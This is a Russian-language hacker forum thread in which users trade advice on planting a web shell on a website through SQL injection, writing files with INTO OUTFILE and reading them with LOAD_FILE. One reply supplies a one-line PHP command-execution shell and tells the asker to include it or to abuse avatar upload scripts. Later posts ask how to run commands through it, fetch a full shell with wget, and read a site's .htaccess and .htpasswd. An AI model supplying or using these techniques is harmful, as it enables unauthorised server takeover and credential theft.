Простите за глупый вопрос, как нужно заливать шелл,когда у меня есть: 1)root-права 2)c://www/www/index.php (знаю путь) 3)ну естественно File_priv=Y Как?.LOAD_FILE (можно посмотреть конфиги ,но не робит ,)но что-то не получаеться Или как узнать префикс? (там самописный сайт,локалка) =\
Фишка в том,что отклюбчен удаленный инклуд, Warning: include() [function.include]: URL file-access is disabled in the server configuration оцтой =\ Хотя если через бд выполнять не include.... а <? echo "lol"; ?> into.... то файл создаеться и все выполняеться,ДАЙТЕ самый маленький шелл плиз))
самый маленький шелл это <? system($_GET[c]) ?> записываешь через инто аутфайл и инклудишь Вообще если у тебя есть локальный инклуд, попробуй найти на сайте какой нить скрипт заливки картинок, аватаров в форуме например
Воспользовался конструкцие как у Спайдера,но не умею юзать я его,к сожалению =\ Как там директорию посмотреть ...php?c=-ls la? Как с этого залить полноценный шелл? wget? zДайте пожалуйста полную констркуцию запроса =) ЗЫ: .php?c= echo "qwe"; -сработало xD
теперь я немного опнял... то есть если я наберу ?c=regedit,то у него вылезит на столе реестр?Что еще посоветуете...кроме "dir" ?
археолог) есть sqli, на сервере - root - File_priv=Y - путь /var/www/имясайта/имяфайла (прописан в нескольких местах в бд, я не думаю, что он ложный) - вывод ошибок выключен - mq - off а сама проблема заключается в том, что при заливке into_outfile даже просто не указывая директорию, а прописывая '1.php' к примеру - выкидывает! когда ввожу полный путь - тоже самое. при load_file открывается корневые .htaccess и .htpasswd но их читает пустыми. тоесть поле пустое и ничего вообще не выводится хотя я уверен там хоть 1 строчка но есть когда вбиваю путь до определенного файла сайта - также выкидывает( что это такое и возможно ли решить проблему?
